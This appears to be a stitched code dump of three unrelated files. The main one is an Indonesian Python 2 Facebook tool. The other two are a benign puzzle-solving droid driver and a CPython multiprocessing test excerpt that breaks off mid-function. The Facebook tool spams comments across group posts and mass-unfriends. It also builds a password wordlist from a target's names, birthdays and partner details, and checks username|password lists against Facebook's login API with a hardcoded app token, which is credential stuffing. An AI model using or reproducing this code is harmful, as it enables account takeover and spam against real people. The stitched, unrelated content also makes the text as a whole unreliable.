raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
part2.py
|
#!/usr/bin/env python3
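# Part 2 driver: executes the droid's program in a background thread while
# play() repeatedly redraws and explores the map, then flood-fills oxygen and
# prints the number of expansion steps. Program and Droid come from the
# accompanying modules; their exact APIs are assumed from the calls used below.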
import sys
import os
import threading
from time import sleep
from program import Program
from droid import Droid
SLEEP_DURATION = 0.0001
def play(d):
while d.is_running():
os.system("clear")
d.display()
if not d.explore():
break
sleep(SLEEP_DURATION)
d.read_sensor()
d.init_oxygen()
i = 0
while d.expand_oxygen():
i += 1
os.system("clear")
d.display()
sleep(SLEEP_DURATION)
print(i)
def main():
data = sys.stdin.readline()
d = Droid(Program(data))
threads = [
threading.Thread(target=d.execute),
threading.Thread(target=lambda: play(d)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
if support.check_sanitizer(address=True):
# bpo-45200: Skip multiprocessing tests if Python is built with ASAN to
    # work around a libasan race condition: a deadlock in pthread_create().
raise unittest.SkipTest("libasan has a pthread_create() dead lock")
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused.
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False     # setting this to True makes the tests take a lot
                          # longer and can sometimes cause non-serious
                          # failures because some calls block a bit longer
                          # than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
    # For the sanity of Windows users: raise instead of crashing or freezing
    # in multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
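# Minimal picklable callable used by test_lose_target_ref below: when invoked
# in the child it checks that it received itself as an argument and puts 5 on
# the queue.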
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
